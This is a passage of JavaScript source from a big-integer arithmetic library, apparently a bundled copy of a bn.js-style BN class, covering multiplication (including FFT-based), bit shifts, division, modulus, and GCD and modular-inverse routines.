        var w10 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w10 >>> 26) | 0;
        w10 &= 0x3ffffff;
        /* k = 11 */ lo = Math.imul(al9, bl2);
        mid = Math.imul(al9, bh2);
        mid = mid + Math.imul(ah9, bl2) | 0;
        hi = Math.imul(ah9, bh2);
        lo = lo + Math.imul(al8, bl3) | 0;
        mid = mid + Math.imul(al8, bh3) | 0;
        mid = mid + Math.imul(ah8, bl3) | 0;
        hi = hi + Math.imul(ah8, bh3) | 0;
        lo = lo + Math.imul(al7, bl4) | 0;
        mid = mid + Math.imul(al7, bh4) | 0;
        mid = mid + Math.imul(ah7, bl4) | 0;
        hi = hi + Math.imul(ah7, bh4) | 0;
        lo = lo + Math.imul(al6, bl5) | 0;
        mid = mid + Math.imul(al6, bh5) | 0;
        mid = mid + Math.imul(ah6, bl5) | 0;
        hi = hi + Math.imul(ah6, bh5) | 0;
        lo = lo + Math.imul(al5, bl6) | 0;
        mid = mid + Math.imul(al5, bh6) | 0;
        mid = mid + Math.imul(ah5, bl6) | 0;
        hi = hi + Math.imul(ah5, bh6) | 0;
        lo = lo + Math.imul(al4, bl7) | 0;
        mid = mid + Math.imul(al4, bh7) | 0;
        mid = mid + Math.imul(ah4, bl7) | 0;
        hi = hi + Math.imul(ah4, bh7) | 0;
        lo = lo + Math.imul(al3, bl8) | 0;
        mid = mid + Math.imul(al3, bh8) | 0;
        mid = mid + Math.imul(ah3, bl8) | 0;
        hi = hi + Math.imul(ah3, bh8) | 0;
        lo = lo + Math.imul(al2, bl9) | 0;
        mid = mid + Math.imul(al2, bh9) | 0;
        mid = mid + Math.imul(ah2, bl9) | 0;
        hi = hi + Math.imul(ah2, bh9) | 0;
        var w11 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w11 >>> 26) | 0;
        w11 &= 0x3ffffff;
        /* k = 12 */ lo = Math.imul(al9, bl3);
        mid = Math.imul(al9, bh3);
        mid = mid + Math.imul(ah9, bl3) | 0;
        hi = Math.imul(ah9, bh3);
        lo = lo + Math.imul(al8, bl4) | 0;
        mid = mid + Math.imul(al8, bh4) | 0;
        mid = mid + Math.imul(ah8, bl4) | 0;
        hi = hi + Math.imul(ah8, bh4) | 0;
        lo = lo + Math.imul(al7, bl5) | 0;
        mid = mid + Math.imul(al7, bh5) | 0;
        mid = mid + Math.imul(ah7, bl5) | 0;
        hi = hi + Math.imul(ah7, bh5) | 0;
        lo = lo + Math.imul(al6, bl6) | 0;
        mid = mid + Math.imul(al6, bh6) | 0;
        mid = mid + Math.imul(ah6, bl6) | 0;
        hi = hi + Math.imul(ah6, bh6) | 0;
        lo = lo + Math.imul(al5, bl7) | 0;
        mid = mid + Math.imul(al5, bh7) | 0;
        mid = mid + Math.imul(ah5, bl7) | 0;
        hi = hi + Math.imul(ah5, bh7) | 0;
        lo = lo + Math.imul(al4, bl8) | 0;
        mid = mid + Math.imul(al4, bh8) | 0;
        mid = mid + Math.imul(ah4, bl8) | 0;
        hi = hi + Math.imul(ah4, bh8) | 0;
        lo = lo + Math.imul(al3, bl9) | 0;
        mid = mid + Math.imul(al3, bh9) | 0;
        mid = mid + Math.imul(ah3, bl9) | 0;
        hi = hi + Math.imul(ah3, bh9) | 0;
        var w12 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w12 >>> 26) | 0;
        w12 &= 0x3ffffff;
        /* k = 13 */ lo = Math.imul(al9, bl4);
        mid = Math.imul(al9, bh4);
        mid = mid + Math.imul(ah9, bl4) | 0;
        hi = Math.imul(ah9, bh4);
        lo = lo + Math.imul(al8, bl5) | 0;
        mid = mid + Math.imul(al8, bh5) | 0;
        mid = mid + Math.imul(ah8, bl5) | 0;
        hi = hi + Math.imul(ah8, bh5) | 0;
        lo = lo + Math.imul(al7, bl6) | 0;
        mid = mid + Math.imul(al7, bh6) | 0;
        mid = mid + Math.imul(ah7, bl6) | 0;
        hi = hi + Math.imul(ah7, bh6) | 0;
        lo = lo + Math.imul(al6, bl7) | 0;
        mid = mid + Math.imul(al6, bh7) | 0;
        mid = mid + Math.imul(ah6, bl7) | 0;
        hi = hi + Math.imul(ah6, bh7) | 0;
        lo = lo + Math.imul(al5, bl8) | 0;
        mid = mid + Math.imul(al5, bh8) | 0;
        mid = mid + Math.imul(ah5, bl8) | 0;
        hi = hi + Math.imul(ah5, bh8) | 0;
        lo = lo + Math.imul(al4, bl9) | 0;
        mid = mid + Math.imul(al4, bh9) | 0;
        mid = mid + Math.imul(ah4, bl9) | 0;
        hi = hi + Math.imul(ah4, bh9) | 0;
        var w13 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w13 >>> 26) | 0;
        w13 &= 0x3ffffff;
        /* k = 14 */ lo = Math.imul(al9, bl5);
        mid = Math.imul(al9, bh5);
        mid = mid + Math.imul(ah9, bl5) | 0;
        hi = Math.imul(ah9, bh5);
        lo = lo + Math.imul(al8, bl6) | 0;
        mid = mid + Math.imul(al8, bh6) | 0;
        mid = mid + Math.imul(ah8, bl6) | 0;
        hi = hi + Math.imul(ah8, bh6) | 0;
        lo = lo + Math.imul(al7, bl7) | 0;
        mid = mid + Math.imul(al7, bh7) | 0;
        mid = mid + Math.imul(ah7, bl7) | 0;
        hi = hi + Math.imul(ah7, bh7) | 0;
        lo = lo + Math.imul(al6, bl8) | 0;
        mid = mid + Math.imul(al6, bh8) | 0;
        mid = mid + Math.imul(ah6, bl8) | 0;
        hi = hi + Math.imul(ah6, bh8) | 0;
        lo = lo + Math.imul(al5, bl9) | 0;
        mid = mid + Math.imul(al5, bh9) | 0;
        mid = mid + Math.imul(ah5, bl9) | 0;
        hi = hi + Math.imul(ah5, bh9) | 0;
        var w14 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w14 >>> 26) | 0;
        w14 &= 0x3ffffff;
        /* k = 15 */ lo = Math.imul(al9, bl6);
        mid = Math.imul(al9, bh6);
        mid = mid + Math.imul(ah9, bl6) | 0;
        hi = Math.imul(ah9, bh6);
        lo = lo + Math.imul(al8, bl7) | 0;
        mid = mid + Math.imul(al8, bh7) | 0;
        mid = mid + Math.imul(ah8, bl7) | 0;
        hi = hi + Math.imul(ah8, bh7) | 0;
        lo = lo + Math.imul(al7, bl8) | 0;
        mid = mid + Math.imul(al7, bh8) | 0;
        mid = mid + Math.imul(ah7, bl8) | 0;
        hi = hi + Math.imul(ah7, bh8) | 0;
        lo = lo + Math.imul(al6, bl9) | 0;
        mid = mid + Math.imul(al6, bh9) | 0;
        mid = mid + Math.imul(ah6, bl9) | 0;
        hi = hi + Math.imul(ah6, bh9) | 0;
        var w15 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w15 >>> 26) | 0;
        w15 &= 0x3ffffff;
        /* k = 16 */ lo = Math.imul(al9, bl7);
        mid = Math.imul(al9, bh7);
        mid = mid + Math.imul(ah9, bl7) | 0;
        hi = Math.imul(ah9, bh7);
        lo = lo + Math.imul(al8, bl8) | 0;
        mid = mid + Math.imul(al8, bh8) | 0;
        mid = mid + Math.imul(ah8, bl8) | 0;
        hi = hi + Math.imul(ah8, bh8) | 0;
        lo = lo + Math.imul(al7, bl9) | 0;
        mid = mid + Math.imul(al7, bh9) | 0;
        mid = mid + Math.imul(ah7, bl9) | 0;
        hi = hi + Math.imul(ah7, bh9) | 0;
        var w16 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w16 >>> 26) | 0;
        w16 &= 0x3ffffff;
        /* k = 17 */ lo = Math.imul(al9, bl8);
        mid = Math.imul(al9, bh8);
        mid = mid + Math.imul(ah9, bl8) | 0;
        hi = Math.imul(ah9, bh8);
        lo = lo + Math.imul(al8, bl9) | 0;
        mid = mid + Math.imul(al8, bh9) | 0;
        mid = mid + Math.imul(ah8, bl9) | 0;
        hi = hi + Math.imul(ah8, bh9) | 0;
        var w17 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w17 >>> 26) | 0;
        w17 &= 0x3ffffff;
        /* k = 18 */ lo = Math.imul(al9, bl9);
        mid = Math.imul(al9, bh9);
        mid = mid + Math.imul(ah9, bl9) | 0;
        hi = Math.imul(ah9, bh9);
        var w18 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w18 >>> 26) | 0;
        w18 &= 0x3ffffff;
        o[0] = w0;
        o[1] = w1;
        o[2] = w2;
        o[3] = w3;
        o[4] = w4;
        o[5] = w5;
        o[6] = w6;
        o[7] = w7;
        o[8] = w8;
        o[9] = w9;
        o[10] = w10;
        o[11] = w11;
        o[12] = w12;
        o[13] = w13;
        o[14] = w14;
        o[15] = w15;
        o[16] = w16;
        o[17] = w17;
        o[18] = w18;
        if (c !== 0) {
            o[19] = c;
            out.length++;
        }
        return out;
    };
    // Polyfill comb
    if (!Math.imul) comb10MulTo = smallMulTo;
    function bigMulTo(self, num, out) {
        out.negative = num.negative ^ self.negative;
        out.length = self.length + num.length;
        var carry = 0;
        var hncarry = 0;
        for(var k = 0; k < out.length - 1; k++){
            // Sum all words with the same `i + j = k` and accumulate `ncarry`,
            // note that ncarry could be >= 0x3ffffff
            var ncarry = hncarry;
            hncarry = 0;
            var rword = carry & 0x3ffffff;
            var maxJ = Math.min(k, num.length - 1);
            for(var j = Math.max(0, k - self.length + 1); j <= maxJ; j++){
                var i = k - j;
                var a = self.words[i] | 0;
                var b = num.words[j] | 0;
                var r = a * b;
                var lo = r & 0x3ffffff;
                ncarry = ncarry + (r / 0x4000000 | 0) | 0;
                lo = lo + rword | 0;
                rword = lo & 0x3ffffff;
                ncarry = ncarry + (lo >>> 26) | 0;
                hncarry += ncarry >>> 26;
                ncarry &= 0x3ffffff;
            }
            out.words[k] = rword;
            carry = ncarry;
            ncarry = hncarry;
        }
        if (carry !== 0) out.words[k] = carry;
        else out.length--;
        return out.strip();
    }
    function jumboMulTo(self, num, out) {
        var fftm = new FFTM();
        return fftm.mulp(self, num, out);
    }
    BN.prototype.mulTo = function mulTo(num, out) {
        var res;
        var len = this.length + num.length;
        if (this.length === 10 && num.length === 10) res = comb10MulTo(this, num, out);
        else if (len < 63) res = smallMulTo(this, num, out);
        else if (len < 1024) res = bigMulTo(this, num, out);
        else res = jumboMulTo(this, num, out);
        return res;
    };
    // Cooley-Tukey algorithm for FFT
    // slightly revisited to rely on looping instead of recursion
    function FFTM(x, y) {
        this.x = x;
        this.y = y;
    }
    FFTM.prototype.makeRBT = function makeRBT(N) {
        var t = new Array(N);
        var l = BN.prototype._countBits(N) - 1;
        for(var i = 0; i < N; i++)t[i] = this.revBin(i, l, N);
        return t;
    };
    // Returns binary-reversed representation of `x`
    FFTM.prototype.revBin = function revBin(x, l, N) {
        if (x === 0 || x === N - 1) return x;
        var rb = 0;
        for(var i = 0; i < l; i++){
            rb |= (x & 1) << l - i - 1;
            x >>= 1;
        }
        return rb;
    };
    // Performs "tweedling" phase, therefore 'emulating'
    // behaviour of the recursive algorithm
    FFTM.prototype.permute = function permute(rbt, rws, iws, rtws, itws, N) {
        for(var i = 0; i < N; i++){
            rtws[i] = rws[rbt[i]];
            itws[i] = iws[rbt[i]];
        }
    };
    FFTM.prototype.transform = function transform(rws, iws, rtws, itws, N, rbt) {
        this.permute(rbt, rws, iws, rtws, itws, N);
        for(var s = 1; s < N; s <<= 1){
            var l = s << 1;
            var rtwdf = Math.cos(2 * Math.PI / l);
            var itwdf = Math.sin(2 * Math.PI / l);
            for(var p = 0; p < N; p += l){
                var rtwdf_ = rtwdf;
                var itwdf_ = itwdf;
                for(var j = 0; j < s; j++){
                    var re = rtws[p + j];
                    var ie = itws[p + j];
                    var ro = rtws[p + j + s];
                    var io = itws[p + j + s];
                    var rx = rtwdf_ * ro - itwdf_ * io;
                    io = rtwdf_ * io + itwdf_ * ro;
                    ro = rx;
                    rtws[p + j] = re + ro;
                    itws[p + j] = ie + io;
                    rtws[p + j + s] = re - ro;
                    itws[p + j + s] = ie - io;
                    /* jshint maxdepth : false */ if (j !== l) {
                        rx = rtwdf * rtwdf_ - itwdf * itwdf_;
                        itwdf_ = rtwdf * itwdf_ + itwdf * rtwdf_;
                        rtwdf_ = rx;
                    }
                }
            }
        }
    };
    FFTM.prototype.guessLen13b = function guessLen13b(n, m) {
        var N = Math.max(m, n) | 1;
        var odd = N & 1;
        var i = 0;
        for(N = N / 2 | 0; N; N = N >>> 1)i++;
        return 1 << i + 1 + odd;
    };
    FFTM.prototype.conjugate = function conjugate(rws, iws, N) {
        if (N <= 1) return;
        for(var i = 0; i < N / 2; i++){
            var t = rws[i];
            rws[i] = rws[N - i - 1];
            rws[N - i - 1] = t;
            t = iws[i];
            iws[i] = -iws[N - i - 1];
            iws[N - i - 1] = -t;
        }
    };
    FFTM.prototype.normalize13b = function normalize13b(ws, N) {
        var carry = 0;
        for(var i = 0; i < N / 2; i++){
            var w = Math.round(ws[2 * i + 1] / N) * 0x2000 + Math.round(ws[2 * i] / N) + carry;
            ws[i] = w & 0x3ffffff;
            if (w < 0x4000000) carry = 0;
            else carry = w / 0x4000000 | 0;
        }
        return ws;
    };
    FFTM.prototype.convert13b = function convert13b(ws, len, rws, N) {
        var carry = 0;
        for(var i = 0; i < len; i++){
            carry = carry + (ws[i] | 0);
            rws[2 * i] = carry & 0x1fff;
            carry = carry >>> 13;
            rws[2 * i + 1] = carry & 0x1fff;
            carry = carry >>> 13;
        }
        // Pad with zeroes
        for(i = 2 * len; i < N; ++i)rws[i] = 0;
        assert(carry === 0);
        assert((carry & -8192) === 0);
    };
    FFTM.prototype.stub = function stub(N) {
        var ph = new Array(N);
        for(var i = 0; i < N; i++)ph[i] = 0;
        return ph;
    };
    FFTM.prototype.mulp = function mulp(x, y, out) {
        var N = 2 * this.guessLen13b(x.length, y.length);
        var rbt = this.makeRBT(N);
        var _ = this.stub(N);
        var rws = new Array(N);
        var rwst = new Array(N);
        var iwst = new Array(N);
        var nrws = new Array(N);
        var nrwst = new Array(N);
        var niwst = new Array(N);
        var rmws = out.words;
        rmws.length = N;
        this.convert13b(x.words, x.length, rws, N);
        this.convert13b(y.words, y.length, nrws, N);
        this.transform(rws, _, rwst, iwst, N, rbt);
        this.transform(nrws, _, nrwst, niwst, N, rbt);
        for(var i = 0; i < N; i++){
            var rx = rwst[i] * nrwst[i] - iwst[i] * niwst[i];
            iwst[i] = rwst[i] * niwst[i] + iwst[i] * nrwst[i];
            rwst[i] = rx;
        }
        this.conjugate(rwst, iwst, N);
        this.transform(rwst, iwst, rmws, _, N, rbt);
        this.conjugate(rmws, _, N);
        this.normalize13b(rmws, N);
        out.negative = x.negative ^ y.negative;
        out.length = x.length + y.length;
        return out.strip();
    };
    // Multiply `this` by `num`
    BN.prototype.mul = function mul(num) {
        var out = new BN(null);
        out.words = new Array(this.length + num.length);
        return this.mulTo(num, out);
    };
    // Multiply employing FFT
    BN.prototype.mulf = function mulf(num) {
        var out = new BN(null);
        out.words = new Array(this.length + num.length);
        return jumboMulTo(this, num, out);
    };
    // In-place Multiplication
    BN.prototype.imul = function imul(num) {
        return this.clone().mulTo(num, this);
    };
    BN.prototype.imuln = function imuln(num) {
        assert(typeof num === "number");
        assert(num < 0x4000000);
        // Carry
        var carry = 0;
        for(var i = 0; i < this.length; i++){
            var w = (this.words[i] | 0) * num;
            var lo = (w & 0x3ffffff) + (carry & 0x3ffffff);
            carry >>= 26;
            carry += w / 0x4000000 | 0;
            // NOTE: lo is 27bit maximum
            carry += lo >>> 26;
            this.words[i] = lo & 0x3ffffff;
        }
        if (carry !== 0) {
            this.words[i] = carry;
            this.length++;
        }
        return this;
    };
    BN.prototype.muln = function muln(num) {
        return this.clone().imuln(num);
    };
    // `this` * `this`
    BN.prototype.sqr = function sqr() {
        return this.mul(this);
    };
    // `this` * `this` in-place
    BN.prototype.isqr = function isqr() {
        return this.imul(this.clone());
    };
    // Math.pow(`this`, `num`)
    BN.prototype.pow = function pow(num) {
        var w = toBitArray(num);
        if (w.length === 0) return new BN(1);
        // Skip leading zeroes
        var res = this;
        for(var i = 0; i < w.length; i++, res = res.sqr()){
            if (w[i] !== 0) break;
        }
        if (++i < w.length) for(var q = res.sqr(); i < w.length; i++, q = q.sqr()){
            if (w[i] === 0) continue;
            res = res.mul(q);
        }
        return res;
    };
    // Shift-left in-place
    BN.prototype.iushln = function iushln(bits) {
        assert(typeof bits === "number" && bits >= 0);
        var r = bits % 26;
        var s = (bits - r) / 26;
        var carryMask = 0x3ffffff >>> 26 - r << 26 - r;
        var i;
        if (r !== 0) {
            var carry = 0;
            for(i = 0; i < this.length; i++){
                var newCarry = this.words[i] & carryMask;
                var c = (this.words[i] | 0) - newCarry << r;
                this.words[i] = c | carry;
                carry = newCarry >>> 26 - r;
            }
            if (carry) {
                this.words[i] = carry;
                this.length++;
            }
        }
        if (s !== 0) {
            for(i = this.length - 1; i >= 0; i--)this.words[i + s] = this.words[i];
            for(i = 0; i < s; i++)this.words[i] = 0;
            this.length += s;
        }
        return this.strip();
    };
    BN.prototype.ishln = function ishln(bits) {
        // TODO(indutny): implement me
        assert(this.negative === 0);
        return this.iushln(bits);
    };
    // Shift-right in-place
    // NOTE: `hint` is a lowest bit before trailing zeroes
    // NOTE: if `extended` is present - it will be filled with destroyed bits
    BN.prototype.iushrn = function iushrn(bits, hint, extended) {
        assert(typeof bits === "number" && bits >= 0);
        var h;
        if (hint) h = (hint - hint % 26) / 26;
        else h = 0;
        var r = bits % 26;
        var s = Math.min((bits - r) / 26, this.length);
        var mask = 0x3ffffff ^ 0x3ffffff >>> r << r;
        var maskedWords = extended;
        h -= s;
        h = Math.max(0, h);
        // Extended mode, copy masked part
        if (maskedWords) {
            for(var i = 0; i < s; i++)maskedWords.words[i] = this.words[i];
            maskedWords.length = s;
        }
        if (s === 0) ;
        else if (this.length > s) {
            this.length -= s;
            for(i = 0; i < this.length; i++)this.words[i] = this.words[i + s];
        } else {
            this.words[0] = 0;
            this.length = 1;
        }
        var carry = 0;
        for(i = this.length - 1; i >= 0 && (carry !== 0 || i >= h); i--){
            var word = this.words[i] | 0;
            this.words[i] = carry << 26 - r | word >>> r;
            carry = word & mask;
        }
        // Push carried bits as a mask
        if (maskedWords && carry !== 0) maskedWords.words[maskedWords.length++] = carry;
        if (this.length === 0) {
            this.words[0] = 0;
            this.length = 1;
        }
        return this.strip();
    };
    BN.prototype.ishrn = function ishrn(bits, hint, extended) {
        // TODO(indutny): implement me
        assert(this.negative === 0);
        return this.iushrn(bits, hint, extended);
    };
    // Shift-left
    BN.prototype.shln = function shln(bits) {
        return this.clone().ishln(bits);
    };
    BN.prototype.ushln = function ushln(bits) {
        return this.clone().iushln(bits);
    };
    // Shift-right
    BN.prototype.shrn = function shrn(bits) {
        return this.clone().ishrn(bits);
    };
    BN.prototype.ushrn = function ushrn(bits) {
        return this.clone().iushrn(bits);
    };
    // Test if n bit is set
    BN.prototype.testn = function testn(bit) {
        assert(typeof bit === "number" && bit >= 0);
        var r = bit % 26;
        var s = (bit - r) / 26;
        var q = 1 << r;
        // Fast case: bit is much higher than all existing words
        if (this.length <= s) return false;
        // Check bit and return
        var w = this.words[s];
        return !!(w & q);
    };
    // Return only lowers bits of number (in-place)
    BN.prototype.imaskn = function imaskn(bits) {
        assert(typeof bits === "number" && bits >= 0);
        var r = bits % 26;
        var s = (bits - r) / 26;
        assert(this.negative === 0, "imaskn works only with positive numbers");
        if (this.length <= s) return this;
        if (r !== 0) s++;
        this.length = Math.min(s, this.length);
        if (r !== 0) {
            var mask = 0x3ffffff ^ 0x3ffffff >>> r << r;
            this.words[this.length - 1] &= mask;
        }
        return this.strip();
    };
    // Return only lowers bits of number
    BN.prototype.maskn = function maskn(bits) {
        return this.clone().imaskn(bits);
    };
    // Add plain number `num` to `this`
    BN.prototype.iaddn = function iaddn(num) {
        assert(typeof num === "number");
        assert(num < 0x4000000);
        if (num < 0) return this.isubn(-num);
        // Possible sign change
        if (this.negative !== 0) {
            if (this.length === 1 && (this.words[0] | 0) < num) {
                this.words[0] = num - (this.words[0] | 0);
                this.negative = 0;
                return this;
            }
            this.negative = 0;
            this.isubn(num);
            this.negative = 1;
            return this;
        }
        // Add without checks
        return this._iaddn(num);
    };
    BN.prototype._iaddn = function _iaddn(num) {
        this.words[0] += num;
        // Carry
        for(var i = 0; i < this.length && this.words[i] >= 0x4000000; i++){
            this.words[i] -= 0x4000000;
            if (i === this.length - 1) this.words[i + 1] = 1;
            else this.words[i + 1]++;
        }
        this.length = Math.max(this.length, i + 1);
        return this;
    };
    // Subtract plain number `num` from `this`
    BN.prototype.isubn = function isubn(num) {
        assert(typeof num === "number");
        assert(num < 0x4000000);
        if (num < 0) return this.iaddn(-num);
        if (this.negative !== 0) {
            this.negative = 0;
            this.iaddn(num);
            this.negative = 1;
            return this;
        }
        this.words[0] -= num;
        if (this.length === 1 && this.words[0] < 0) {
            this.words[0] = -this.words[0];
            this.negative = 1;
        } else // Carry
        for(var i = 0; i < this.length && this.words[i] < 0; i++){
            this.words[i] += 0x4000000;
            this.words[i + 1] -= 1;
        }
        return this.strip();
    };
    BN.prototype.addn = function addn(num) {
        return this.clone().iaddn(num);
    };
    BN.prototype.subn = function subn(num) {
        return this.clone().isubn(num);
    };
    BN.prototype.iabs = function iabs() {
        this.negative = 0;
        return this;
    };
    BN.prototype.abs = function abs() {
        return this.clone().iabs();
    };
    BN.prototype._ishlnsubmul = function _ishlnsubmul(num, mul, shift) {
        var len = num.length + shift;
        var i;
        this._expand(len);
        var w;
        var carry = 0;
        for(i = 0; i < num.length; i++){
            w = (this.words[i + shift] | 0) + carry;
            var right = (num.words[i] | 0) * mul;
            w -= right & 0x3ffffff;
            carry = (w >> 26) - (right / 0x4000000 | 0);
            this.words[i + shift] = w & 0x3ffffff;
        }
        for(; i < this.length - shift; i++){
            w = (this.words[i + shift] | 0) + carry;
            carry = w >> 26;
            this.words[i + shift] = w & 0x3ffffff;
        }
        if (carry === 0) return this.strip();
        // Subtraction overflow
        assert(carry === -1);
        carry = 0;
        for(i = 0; i < this.length; i++){
            w = -(this.words[i] | 0) + carry;
            carry = w >> 26;
            this.words[i] = w & 0x3ffffff;
        }
        this.negative = 1;
        return this.strip();
    };
    BN.prototype._wordDiv = function _wordDiv(num, mode) {
        var shift = this.length - num.length;
        var a = this.clone();
        var b = num;
        // Normalize
        var bhi = b.words[b.length - 1] | 0;
        var bhiBits = this._countBits(bhi);
        shift = 26 - bhiBits;
        if (shift !== 0) {
            b = b.ushln(shift);
            a.iushln(shift);
            bhi = b.words[b.length - 1] | 0;
        }
        // Initialize quotient
        var m = a.length - b.length;
        var q;
        if (mode !== "mod") {
            q = new BN(null);
            q.length = m + 1;
            q.words = new Array(q.length);
            for(var i = 0; i < q.length; i++)q.words[i] = 0;
        }
        var diff = a.clone()._ishlnsubmul(b, 1, m);
        if (diff.negative === 0) {
            a = diff;
            if (q) q.words[m] = 1;
        }
        for(var j = m - 1; j >= 0; j--){
            var qj = (a.words[b.length + j] | 0) * 0x4000000 + (a.words[b.length + j - 1] | 0);
            // NOTE: (qj / bhi) is (0x3ffffff * 0x4000000 + 0x3ffffff) / 0x2000000 max
            // (0x7ffffff)
            qj = Math.min(qj / bhi | 0, 0x3ffffff);
            a._ishlnsubmul(b, qj, j);
            while(a.negative !== 0){
                qj--;
                a.negative = 0;
                a._ishlnsubmul(b, 1, j);
                if (!a.isZero()) a.negative ^= 1;
            }
            if (q) q.words[j] = qj;
        }
        if (q) q.strip();
        a.strip();
        // Denormalize
        if (mode !== "div" && shift !== 0) a.iushrn(shift);
        return {
            div: q || null,
            mod: a
        };
    };
    // NOTE: 1) `mode` can be set to `mod` to request mod only,
    //       to `div` to request div only, or be absent to
    //       request both div & mod
    //       2) `positive` is true if unsigned mod is requested
    BN.prototype.divmod = function divmod(num, mode, positive) {
        assert(!num.isZero());
        if (this.isZero()) return {
            div: new BN(0),
            mod: new BN(0)
        };
        var div, mod, res;
        if (this.negative !== 0 && num.negative === 0) {
            res = this.neg().divmod(num, mode);
            if (mode !== "mod") div = res.div.neg();
            if (mode !== "div") {
                mod = res.mod.neg();
                if (positive && mod.negative !== 0) mod.iadd(num);
            }
            return {
                div: div,
                mod: mod
            };
        }
        if (this.negative === 0 && num.negative !== 0) {
            res = this.divmod(num.neg(), mode);
            if (mode !== "mod") div = res.div.neg();
            return {
                div: div,
                mod: res.mod
            };
        }
        if ((this.negative & num.negative) !== 0) {
            res = this.neg().divmod(num.neg(), mode);
            if (mode !== "div") {
                mod = res.mod.neg();
                if (positive && mod.negative !== 0) mod.isub(num);
            }
            return {
                div: res.div,
                mod: mod
            };
        }
        // Both numbers are positive at this point
        // Strip both numbers to approximate shift value
        if (num.length > this.length || this.cmp(num) < 0) return {
            div: new BN(0),
            mod: this
        };
        // Very short reduction
        if (num.length === 1) {
            if (mode === "div") return {
                div: this.divn(num.words[0]),
                mod: null
            };
            if (mode === "mod") return {
                div: null,
                mod: new BN(this.modn(num.words[0]))
            };
            return {
                div: this.divn(num.words[0]),
                mod: new BN(this.modn(num.words[0]))
            };
        }
        return this._wordDiv(num, mode);
    };
    // Find `this` / `num`
    BN.prototype.div = function div(num) {
        return this.divmod(num, "div", false).div;
    };
    // Find `this` % `num`
    BN.prototype.mod = function mod(num) {
        return this.divmod(num, "mod", false).mod;
    };
    BN.prototype.umod = function umod(num) {
        return this.divmod(num, "mod", true).mod;
    };
    // Find Round(`this` / `num`)
    BN.prototype.divRound = function divRound(num) {
        var dm = this.divmod(num);
        // Fast case - exact division
        if (dm.mod.isZero()) return dm.div;
        var mod = dm.div.negative !== 0 ? dm.mod.isub(num) : dm.mod;
        var half = num.ushrn(1);
        var r2 = num.andln(1);
        var cmp = mod.cmp(half);
        // Round down
        if (cmp < 0 || r2 === 1 && cmp === 0) return dm.div;
        // Round up
        return dm.div.negative !== 0 ? dm.div.isubn(1) : dm.div.iaddn(1);
    };
    BN.prototype.modn = function modn(num) {
        assert(num <= 0x3ffffff);
        var p = 67108864 % num;
        var acc = 0;
        for(var i = this.length - 1; i >= 0; i--)acc = (p * acc + (this.words[i] | 0)) % num;
        return acc;
    };
    // In-place division by number
    BN.prototype.idivn = function idivn(num) {
        assert(num <= 0x3ffffff);
        var carry = 0;
        for(var i = this.length - 1; i >= 0; i--){
            var w = (this.words[i] | 0) + carry * 0x4000000;
            this.words[i] = w / num | 0;
            carry = w % num;
        }
        return this.strip();
    };
    BN.prototype.divn = function divn(num) {
        return this.clone().idivn(num);
    };
    BN.prototype.egcd = function egcd(p) {
        assert(p.negative === 0);
        assert(!p.isZero());
        var x = this;
        var y = p.clone();
        if (x.negative !== 0) x = x.umod(p);
        else x = x.clone();
        // A * x + B * y = x
        var A = new BN(1);
        var B = new BN(0);
        // C * x + D * y = y
        var C = new BN(0);
        var D = new BN(1);
        var g = 0;
        while(x.isEven() && y.isEven()){
            x.iushrn(1);
            y.iushrn(1);
            ++g;
        }
        var yp = y.clone();
        var xp = x.clone();
        while(!x.isZero()){
            for(var i = 0, im = 1; (x.words[0] & im) === 0 && i < 26; ++i, im <<= 1);
            if (i > 0) {
                x.iushrn(i);
                while(i-- > 0){
                    if (A.isOdd() || B.isOdd()) {
                        A.iadd(yp);
                        B.isub(xp);
                    }
                    A.iushrn(1);
                    B.iushrn(1);
                }
            }
            for(var j = 0, jm = 1; (y.words[0] & jm) === 0 && j < 26; ++j, jm <<= 1);
            if (j > 0) {
                y.iushrn(j);
                while(j-- > 0){
                    if (C.isOdd() || D.isOdd()) {
                        C.iadd(yp);
                        D.isub(xp);
                    }
                    C.iushrn(1);
                    D.iushrn(1);
                }
            }
            if (x.cmp(y) >= 0) {
                x.isub(y);
                A.isub(C);
                B.isub(D);
            } else {
                y.isub(x);
                C.isub(A);
                D.isub(B);
            }
        }
        return {
            a: C,
            b: D,
            gcd: y.iushln(g)
        };
    };
    // This is reduced incarnation of the binary EEA
    // above, designated to invert members of the
    // _prime_ fields F(p) at a maximal speed
    BN.prototype._invmp = function _invmp(p) {
        assert(p.negative === 0);
        assert(!p.isZero());
        var a = this;
        var b = p.clone();
        if (a.negative !== 0) a = a.umod(p);
        else a = a.clone();
        var x1 = new BN(1);
        var x2 = new BN(0);
        var delta = b.clone();
        while(a.cmpn(1) > 0 && b.cmpn(1) > 0){
            for(var i = 0, im = 1; (a.words[0] & im) === 0 && i < 26; ++i, im <<= 1);
            if (i > 0) {
                a.iushrn(i);
                while(i-- > 0){
                    if (x1.isOdd()) x1.iadd(delta);
                    x1.iushrn(1);
                }
            }
            for(var j = 0, jm = 1; (b.words[0] & jm) === 0 && j < 26; ++j, jm <<= 1);
            if (j > 0) {
                b.iushrn(j);
                while(j-- > 0){
                    if (x2.isOdd()) x2.iadd(delta);
                    x2.iushrn(1);
                }
            }
            if (a.cmp(b) >= 0) {
                a.isub(b);
                x1.isub(x2);
            } else {
                b.isub(a);
                x2.isub(x1);
            }
        }
        var res;
        if (a.cmpn(1) === 0) res = x1;
        else res = x2;
        if (res.cmpn(0) < 0) res.iadd(p);
        return res;
    };
    BN.prototype.gcd = function gcd(num) {
        if (this.isZero()) return num.abs();
        if (num.isZero()) return this.abs();
        var a = this.clone();
        var b = num.clone();
        a.negative = 0;
        b.negative = 0;
        // Remove common factor of two
        for(var shift = 0; a.isEven() && b.isEven(); shift++){
            a.iushrn(1);
            b.iushrn(1);
        }
        do {
